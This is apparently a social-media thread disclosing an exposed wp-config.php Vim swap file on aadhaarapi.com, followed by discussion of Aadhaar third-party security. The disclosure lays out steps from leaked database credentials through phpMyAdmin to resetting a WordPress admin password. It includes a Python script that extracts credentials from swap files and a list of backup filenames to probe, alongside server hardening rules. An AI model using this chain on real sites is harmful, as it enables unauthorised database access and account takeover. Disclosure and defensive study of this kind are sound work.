After a quick @_WPScan_ scan you were able to see this line: "A wp-config.php backup file has been found in: 'https://aadhaarapi.com/.wp-config.php.swp …'" pic.twitter.com/BHnDR0jzDE
After downloading this file, you could open it like this: vim -R .wp-config.php.swp and obtain the database user and password. pic.twitter.com/qTdweo5NJP
Next step was to find the phpMyAdmin panel. Testing port 2083 or /phpmyadmin is always a good idea. pic.twitter.com/ngB5eRkUWc
After login, open the wp_users table and change the password of an existing user. Go to /wp-admin and enter that username with the new password, and you are in!
Issue found: 16 Jan
1st contact with @aadhaarapi: 17 Jan
Issue fixed: 17 Jan
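The chain above works because Vim writes the edited buffer's lines verbatim into its .swp file, so a dotfile the web server happily serves leaks the contents of a PHP file it would otherwise only execute. The script below is an added example, not code from the original thread or from WPScan: it recovers the `DB_*` defines and the swap header's user, host and original path from a constructed sample swap file, and lists the backup-style filenames worth probing next to wp-config.php (a typical list, not WPScan's exact one). The block0 header offsets are taken from Vim's memline.c `struct block0` and are an assumption to verify against your Vim version; the sample bytes are constructed here.

```python
"""Recover credentials and editor metadata from an exposed Vim swap file.

Added example (not from the original thread). Vim stores the buffer's
text verbatim in data blocks, so a regex over the raw bytes is enough
to pull wp-config.php's define() lines; `vim -R file.swp` shows the
whole buffer if you want everything.
"""
import re

# Vim block0 header layout (memline.c, struct block0): assumed offsets,
# check against your Vim version if the fields look wrong.
#   0..2   b0_id       "b0"
#   2..12  b0_version  "VIM 8.0"
#   28..68 b0_uname    user who was editing
#   68..108 b0_hname   hostname of the editing machine
#   108..1008 b0_fname absolute path of the edited file
B0_UNAME = slice(28, 68)
B0_HNAME = slice(68, 108)
B0_FNAME = slice(108, 1008)

# Matches define('DB_NAME', 'value') style lines as they appear in wp-config.php.
DEFINE_RE = re.compile(rb"define\(\s*'(DB_[A-Z_]+)'\s*,\s*'([^']*)'\s*\)")


def _cstr(buf: bytes) -> str:
    """Decode a NUL-padded C string field."""
    return buf.split(b"\0", 1)[0].decode("utf-8", "replace")


def swap_header(data: bytes) -> dict:
    """Return the metadata a swap header leaks (user, host, original path)."""
    if not data.startswith(b"b0VIM"):
        raise ValueError("not a Vim block0 swap file")
    return {
        "version": _cstr(data[2:12]),
        "user": _cstr(data[B0_UNAME]),
        "host": _cstr(data[B0_HNAME]),
        "file": _cstr(data[B0_FNAME]),
    }


def wp_db_defines(data: bytes) -> dict:
    """Extract DB_* defines from the raw swap bytes (no swap parsing needed)."""
    return {k.decode(): v.decode("utf-8", "replace") for k, v in DEFINE_RE.findall(data)}


def backup_candidates(name: str = "wp-config.php") -> list:
    """Editor/backup leftovers to probe next to a sensitive file (typical list)."""
    return [
        f".{name}.swp", f".{name}.swo", f"{name}.swp",
        f"{name}~", f"{name}.bak", f"{name}.old", f"{name}.save",
        f"{name}.orig", f"{name}.txt",
    ]


def build_sample_swap() -> bytes:
    """Constructed sample: a block0 header followed by a data block with wp-config lines."""
    hdr = bytearray(1024)
    hdr[0:9] = b"b0VIM 8.0"
    hdr[28:34] = b"deploy"
    hdr[68:73] = b"web01"
    fname = b"/var/www/html/wp-config.php"
    hdr[108:108 + len(fname)] = fname
    body = (
        b"<?php\n"
        b"define('DB_NAME', 'wp_prod');\n"
        b"define('DB_USER', 'wpuser');\n"
        b"define('DB_PASSWORD', 'S3cr3t!pass');\n"
        b"define('DB_HOST', 'localhost');\n"
    )
    return bytes(hdr) + b"ad\0\0" + body  # "ad" is Vim's data-block id


if __name__ == "__main__":
    swp = build_sample_swap()
    print(swap_header(swp))
    print(wp_db_defines(swp))
    print(backup_candidates())
```

The header fields are worth keeping: the username and absolute path tell you the file was edited in place on the server, which is the deployment-process question raised in the replies. The fix on the server side is to refuse to serve dotfiles and editor leftovers at all (for nginx, `location ~ /\. { deny all; }` plus a rule for `~`/`.bak` names; for Apache, a `<FilesMatch "^\.">` block with `Require all denied`), and to deploy from version control rather than editing production files.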
.@aadhaarapi after having been caught with an issue like this, can I suggest that you at least update your #wordpress plugins? pic.twitter.com/0tzCv7XcPN
Hey @aadharapi, can you please tell us how the swap file got there? Do you not have a proper deployment process? Or is there no review of what gets committed and pushed? Or do your devs write code on the production machine (scary!)?
Guys, at least learn to use Puppet if you want to make us poor Indians into puppets at the end of the Aadhaar chain. You're doing stupid things I've seen developers fired for, one after the other.
Sir, I really don't understand coding at all, but you are right. If this had been a private company, the people behind this would have been fired by now.
It is a private company, providing paid services on top of data they purchase from UIDAI. It's not Aadhaar itself.
A special sort of private company given the amount of access they have. A security auditor would have nightmares with this entire mess.
I did a little Googling and found that AadharAPI is just a Sub-AUA, most probably getting its data from @KhoslaLabs, which is the primary AUA and responsible for the security of the data. Here is the total list of AUAs maintained by UIDAI.
https://uidai.gov.in/images/list_of_live_aua.pdf …
Ah, guess where the buck finally stops for security, regardless of sub-sub-sub-AUA type outsourcing?
It's not outsourcing... It's auth service access. As I already said, UIDAI needs to extend their net. But at the same time, you won't blame ICICI or Visa if someone hacks Paytm's or PayU's stored card database.
@UIDAI can you look into this? You need to extend your security checks to all third parties like these and avoid such potential vulnerabilities.
If their front-facing sites are this carelessly coded, is it even safe to integrate the API with production sites?
Exactly... It's an open market. Find some secure ASA if AadharAPI feels insecure. The only thing is, UIDAI/Aadhaar and AadharAPI are two different entities. Don't go by the similar names.
ANDDDD... JUST LIKE THAT they have the "world's most largest private database"? FFS
@rssharma3 @UIDAI - I'm assuming you still want to stick to your age-old line of 'There has never been an Aadhaar breach, and anyone saying otherwise is a liar'?
These same jokers (Quagga Tech) were responsible for the API key leak that resulted in fakes getting into the system. https://medium.com/karana/insecure-app-making-abd8548c3092 … pic.twitter.com/x3qitug6sS